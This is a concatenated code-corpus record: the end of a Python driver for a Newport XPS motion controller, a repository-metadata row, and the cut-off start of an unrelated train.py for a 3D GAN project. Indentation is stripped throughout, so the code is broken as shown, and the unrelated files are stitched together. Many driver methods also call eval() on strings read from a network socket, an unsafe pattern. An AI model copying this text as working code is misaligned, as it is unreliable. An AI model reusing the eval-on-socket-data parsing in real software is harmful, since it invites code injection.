command = 'PositionerTimeFlasherSet(' + PositionerName + ',' + str(MinimumPosition) + ',' + str(MaximumPosition) + ',' + str(TimeInterval) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerTimeFlasherEnable : Enable time flasher
def PositionerTimeFlasherEnable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerTimeFlasherEnable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerTimeFlasherDisable : Disable time flasher
def PositionerTimeFlasherDisable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerTimeFlasherDisable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerUserTravelLimitsGet : Read UserMinimumTarget and UserMaximumTarget
def PositionerUserTravelLimitsGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerUserTravelLimitsGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerUserTravelLimitsSet : Update UserMinimumTarget and UserMaximumTarget
def PositionerUserTravelLimitsSet (self, socketId, PositionerName, UserMinimumTarget, UserMaximumTarget):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerUserTravelLimitsSet(' + PositionerName + ',' + str(UserMinimumTarget) + ',' + str(UserMaximumTarget) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerDACOffsetGet : Get DAC offsets
def PositionerDACOffsetGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDACOffsetGet(' + PositionerName + ',short *,short *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerDACOffsetSet : Set DAC offsets
def PositionerDACOffsetSet (self, socketId, PositionerName, DACOffset1, DACOffset2):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDACOffsetSet(' + PositionerName + ',' + str(DACOffset1) + ',' + str(DACOffset2) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerDACOffsetDualGet : Get dual DAC offsets
def PositionerDACOffsetDualGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDACOffsetDualGet(' + PositionerName + ',short *,short *,short *,short *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerDACOffsetDualSet : Set dual DAC offsets
def PositionerDACOffsetDualSet (self, socketId, PositionerName, PrimaryDACOffset1, PrimaryDACOffset2, SecondaryDACOffset1, SecondaryDACOffset2):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDACOffsetDualSet(' + PositionerName + ',' + str(PrimaryDACOffset1) + ',' + str(PrimaryDACOffset2) + ',' + str(SecondaryDACOffset1) + ',' + str(SecondaryDACOffset2) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorAutoTuning : Astrom&Hagglund based auto-tuning
def PositionerCorrectorAutoTuning (self, socketId, PositionerName, TuningMode):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorAutoTuning(' + PositionerName + ',' + str(TuningMode) + ',double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerAccelerationAutoScaling : Astrom&Hagglund based auto-scaling
def PositionerAccelerationAutoScaling (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerAccelerationAutoScaling(' + PositionerName + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# MultipleAxesPVTVerification : Multiple axes PVT trajectory verification
def MultipleAxesPVTVerification (self, socketId, GroupName, TrajectoryFileName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTVerification(' + GroupName + ',' + TrajectoryFileName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# MultipleAxesPVTVerificationResultGet : Multiple axes PVT trajectory verification result get
def MultipleAxesPVTVerificationResultGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTVerificationResultGet(' + PositionerName + ',char *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# MultipleAxesPVTExecution : Multiple axes PVT trajectory execution
def MultipleAxesPVTExecution (self, socketId, GroupName, TrajectoryFileName, ExecutionNumber):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTExecution(' + GroupName + ',' + TrajectoryFileName + ',' + str(ExecutionNumber) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# MultipleAxesPVTParametersGet : Multiple axes PVT trajectory get parameters
def MultipleAxesPVTParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTParametersGet(' + GroupName + ',char *,int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# MultipleAxesPVTPulseOutputSet : Configure pulse output on trajectory
def MultipleAxesPVTPulseOutputSet (self, socketId, GroupName, StartElement, EndElement, TimeInterval):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTPulseOutputSet(' + GroupName + ',' + str(StartElement) + ',' + str(EndElement) + ',' + str(TimeInterval) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# MultipleAxesPVTPulseOutputGet : Get pulse output on trajectory configuration
def MultipleAxesPVTPulseOutputGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTPulseOutputGet(' + GroupName + ',int *,int *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# SingleAxisSlaveModeEnable : Enable the slave mode
def SingleAxisSlaveModeEnable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SingleAxisSlaveModeEnable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SingleAxisSlaveModeDisable : Disable the slave mode
def SingleAxisSlaveModeDisable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SingleAxisSlaveModeDisable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SingleAxisSlaveParametersSet : Set slave parameters
def SingleAxisSlaveParametersSet (self, socketId, GroupName, PositionerName, Ratio):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SingleAxisSlaveParametersSet(' + GroupName + ',' + PositionerName + ',' + str(Ratio) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SingleAxisSlaveParametersGet : Get slave parameters
def SingleAxisSlaveParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SingleAxisSlaveParametersGet(' + GroupName + ',char *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# SpindleSlaveModeEnable : Enable the slave mode
def SpindleSlaveModeEnable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SpindleSlaveModeEnable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SpindleSlaveModeDisable : Disable the slave mode
def SpindleSlaveModeDisable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SpindleSlaveModeDisable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SpindleSlaveParametersSet : Set slave parameters
def SpindleSlaveParametersSet (self, socketId, GroupName, PositionerName, Ratio):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SpindleSlaveParametersSet(' + GroupName + ',' + PositionerName + ',' + str(Ratio) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SpindleSlaveParametersGet : Get slave parameters
def SpindleSlaveParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SpindleSlaveParametersGet(' + GroupName + ',char *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# GroupSpinParametersSet : Modify Spin parameters on selected group and activate the continuous move
def GroupSpinParametersSet (self, socketId, GroupName, Velocity, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupSpinParametersSet(' + GroupName + ',' + str(Velocity) + ',' + str(Acceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupSpinParametersGet : Get Spin parameters on selected group
def GroupSpinParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupSpinParametersGet(' + GroupName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupSpinCurrentGet : Get Spin current on selected group
def GroupSpinCurrentGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupSpinCurrentGet(' + GroupName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupSpinModeStop : Stop Spin mode on selected group with specified acceleration
def GroupSpinModeStop (self, socketId, GroupName, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupSpinModeStop(' + GroupName + ',' + str(Acceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYLineArcVerification : XY trajectory verification
def XYLineArcVerification (self, socketId, GroupName, TrajectoryFileName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcVerification(' + GroupName + ',' + TrajectoryFileName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYLineArcVerificationResultGet : XY trajectory verification result get
def XYLineArcVerificationResultGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcVerificationResultGet(' + PositionerName + ',char *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# XYLineArcExecution : XY trajectory execution
def XYLineArcExecution (self, socketId, GroupName, TrajectoryFileName, Velocity, Acceleration, ExecutionNumber):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcExecution(' + GroupName + ',' + TrajectoryFileName + ',' + str(Velocity) + ',' + str(Acceleration) + ',' + str(ExecutionNumber) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYLineArcParametersGet : XY trajectory get parameters
def XYLineArcParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcParametersGet(' + GroupName + ',char *,double *,double *,int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# XYLineArcPulseOutputSet : Configure pulse output on trajectory
def XYLineArcPulseOutputSet (self, socketId, GroupName, StartLength, EndLength, PathLengthInterval):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcPulseOutputSet(' + GroupName + ',' + str(StartLength) + ',' + str(EndLength) + ',' + str(PathLengthInterval) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYLineArcPulseOutputGet : Get pulse output on trajectory configuration
def XYLineArcPulseOutputGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcPulseOutputGet(' + GroupName + ',double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# XYZGroupPositionCorrectedProfilerGet : Return corrected profiler positions
def XYZGroupPositionCorrectedProfilerGet (self, socketId, GroupName, PositionX, PositionY, PositionZ):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYZGroupPositionCorrectedProfilerGet(' + GroupName + ',' + str(PositionX) + ',' + str(PositionY) + ',' + str(PositionZ) + ',double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# XYZSplineVerification : XYZ trajectory verifivation
def XYZSplineVerification (self, socketId, GroupName, TrajectoryFileName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYZSplineVerification(' + GroupName + ',' + TrajectoryFileName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYZSplineVerificationResultGet : XYZ trajectory verification result get
def XYZSplineVerificationResultGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYZSplineVerificationResultGet(' + PositionerName + ',char *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# XYZSplineExecution : XYZ trajectory execution
def XYZSplineExecution (self, socketId, GroupName, TrajectoryFileName, Velocity, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYZSplineExecution(' + GroupName + ',' + TrajectoryFileName + ',' + str(Velocity) + ',' + str(Acceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYZSplineParametersGet : XYZ trajectory get parameters
def XYZSplineParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYZSplineParametersGet(' + GroupName + ',char *,double *,double *,int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# OptionalModuleExecute : Execute an optional module
def OptionalModuleExecute (self, socketId, ModuleFileName, TaskName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'OptionalModuleExecute(' + ModuleFileName + ',' + TaskName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# OptionalModuleKill : Kill an optional module
def OptionalModuleKill (self, socketId, TaskName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'OptionalModuleKill(' + TaskName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EEPROMCIESet : Set CIE EEPROM reference string
def EEPROMCIESet (self, socketId, CardNumber, ReferenceString):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EEPROMCIESet(' + str(CardNumber) + ',' + ReferenceString + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EEPROMDACOffsetCIESet : Set CIE DAC offsets
def EEPROMDACOffsetCIESet (self, socketId, PlugNumber, DAC1Offset, DAC2Offset):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EEPROMDACOffsetCIESet(' + str(PlugNumber) + ',' + str(DAC1Offset) + ',' + str(DAC2Offset) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EEPROMDriverSet : Set Driver EEPROM reference string
def EEPROMDriverSet (self, socketId, PlugNumber, ReferenceString):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EEPROMDriverSet(' + str(PlugNumber) + ',' + ReferenceString + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EEPROMINTSet : Set INT EEPROM reference string
def EEPROMINTSet (self, socketId, CardNumber, ReferenceString):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EEPROMINTSet(' + str(CardNumber) + ',' + ReferenceString + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# CPUCoreAndBoardSupplyVoltagesGet : Get power informations
def CPUCoreAndBoardSupplyVoltagesGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'CPUCoreAndBoardSupplyVoltagesGet(double *,double *,double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(8):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# CPUTemperatureAndFanSpeedGet : Get CPU temperature and fan speed
def CPUTemperatureAndFanSpeedGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'CPUTemperatureAndFanSpeedGet(double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# ActionListGet : Action list
def ActionListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ActionListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ActionExtendedListGet : Action extended list
def ActionExtendedListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ActionExtendedListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# APIExtendedListGet : API method list
def APIExtendedListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'APIExtendedListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# APIListGet : API method list without extended API
def APIListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'APIListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ControllerStatusListGet : Controller status list
def ControllerStatusListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ControllerStatusListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ErrorListGet : Error list
def ErrorListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ErrorListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventListGet : General event list
def EventListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringListGet : Gathering type list
def GatheringListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExtendedListGet : Gathering type extended list
def GatheringExtendedListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExtendedListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExternalListGet : External Gathering type list
def GatheringExternalListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupStatusListGet : Group status list
def GroupStatusListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupStatusListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# HardwareInternalListGet : Internal hardware list
def HardwareInternalListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'HardwareInternalListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# HardwareDriverAndStageGet : Smart hardware
def HardwareDriverAndStageGet (self, socketId, PlugNumber):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'HardwareDriverAndStageGet(' + str(PlugNumber) + ',char *,char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ObjectsListGet : Group name and positioner name
def ObjectsListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ObjectsListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerErrorListGet : Positioner error list
def PositionerErrorListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerErrorListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerHardwareStatusListGet : Positioner hardware status list
def PositionerHardwareStatusListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerHardwareStatusListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerDriverStatusListGet : Positioner driver status list
def PositionerDriverStatusListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverStatusListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ReferencingActionListGet : Get referencing action list
def ReferencingActionListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ReferencingActionListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ReferencingSensorListGet : Get referencing sensor list
def ReferencingSensorListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ReferencingSensorListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringUserDatasGet : Return user data values
def GatheringUserDatasGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringUserDatasGet(double *,double *,double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(8):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# ControllerMotionKernelPeriodMinMaxGet : Get controller motion kernel min/max periods
def ControllerMotionKernelPeriodMinMaxGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ControllerMotionKernelPeriodMinMaxGet(double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(6):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# ControllerMotionKernelPeriodMinMaxReset : Reset controller motion kernel min/max periods
def ControllerMotionKernelPeriodMinMaxReset (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ControllerMotionKernelPeriodMinMaxReset()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SocketsStatusGet : Get sockets current status
def SocketsStatusGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SocketsStatusGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# TestTCP : Test TCP/IP transfert
def TestTCP (self, socketId, InputString):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'TestTCP(' + InputString + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
| [
"newville@cars.uchicago.edu"
] | newville@cars.uchicago.edu |
e8688df2a0668840385211661efffb0fc71f604f | 42ec4645884c44f9bee3ea2628e54b30680e2880 | /train.py | d882d258a58d48a550b2447d1b5d9fcd78e8f37a | [] | no_license | Sanyem/3dgan | 4d67b67ace160f74485bb45423e8cf5f53cfad03 | 86e69cf20a70d9a12cf0b07a39e79bcf17a5f77a | refs/heads/master | 2020-04-10T21:20:00.332669 | 2018-05-06T21:46:41 | 2018-05-06T21:46:41 | 161,293,932 | 0 | 1 | null | 2018-12-11T07:23:42 | 2018-12-11T07:23:41 | null | UTF-8 | Python | false | false | 13,012 | py | import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # only log errors
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.ERROR) # only log errors
import numpy as np
import sys
import random
import argparse
import uuid
import pickle
import h5py
import cv2
import time
from tqdm import tqdm, trange
from sys import stdout
from os import path
from util import *
from data import get_dataset
from models.cnn import cnn
from models.gan import gan
from models.vae import vae
class load_args_from_file(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
# add '--' prefix to options if not set
contents = values.read().split()
for i in range(int(len(contents)/2)):
if contents[i*2][0:2] != '--':
contents[i*2] = '--' + contents[i*2]
# parse
data = parser.parse_args(contents, namespace=namespace)
# set values, ignoring any --config option in file
for k, v in vars(data).items():
if v and k != option_string.strip('-'):
setattr(namespace, k, v)
if __name__ == '__main__':
# command line arguments
######################################################################
parser = argparse.ArgumentParser(description='Autoencoder training harness.',
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
epilog="""Example:
python train.py --model gan
--data floorplans
--epochs 100
--batch_size 192
--n_gpus 2
--dir workspace/gan/run1""")
parser._action_groups.pop()
model_args = parser.add_argument_group('Model')
data_args = parser.add_argument_group('Data')
optimizer_args = parser.add_argument_group('Optimizer')
train_args = parser.add_argument_group('Training')
misc_args = parser.add_argument_group('Miscellaneous')
# misc settings
add = misc_args.add_argument
add('--config',
type=open,
action=load_args_from_file,
help="""Read in a file containing command arguments. Any additional command
line arguments will overwrite those same options set in the config file.""")
add('--seed',
type=int,
help="Useful for debugging. Randomized each execution if not set.")
add('--n_gpus',
type=int,
default=1,
help="""Number of GPUs to use for simultaneous training. Model will be
duplicated on each device and results averaged on CPU.""")
add('--profile',
default=False,
action='store_true',
help="""Enables runtime metadata collection during training that is
viewable in TensorBoard.""")
# training settings
add = train_args.add_argument
add('--epochs',
default='3',
help="""Number of epochs to train for during this run. Use an integer to
denote the max number of epochs to train for, or `+n` for an
additional n epochs from a saved checkpoint.""")
add('--batch_size',
type=int,
default=256,
help="Batch size to use, per device.")
add('--epoch_size',
type=int,
default=-1,
help="""Number of iterations to use per epoch. Defaults to using the
entire dataset.""")
add('--examples',
type=int,
default=64,
help="""Number of examples to generate when sampling from generative models
(if supported). Note, this must be a power of 2.""")
add('--dir',
type=str,
default='workspace/{}'.format(uuid.uuid4()),
help="""Location to store checkpoints, logs, etc. If this location is populated
by a previous run then training will be continued from last checkpoint.""")
add('--n_disc_train',
type=int,
default=5,
help="""Number of times to train discriminator before training generator
(if applicable).""")
# optimizer settings
add = optimizer_args.add_argument
add('--optimizer',
type=lambda s: s.lower(),
default='rmsprop',
help="Optimizer to use during training.")
add('--lr',
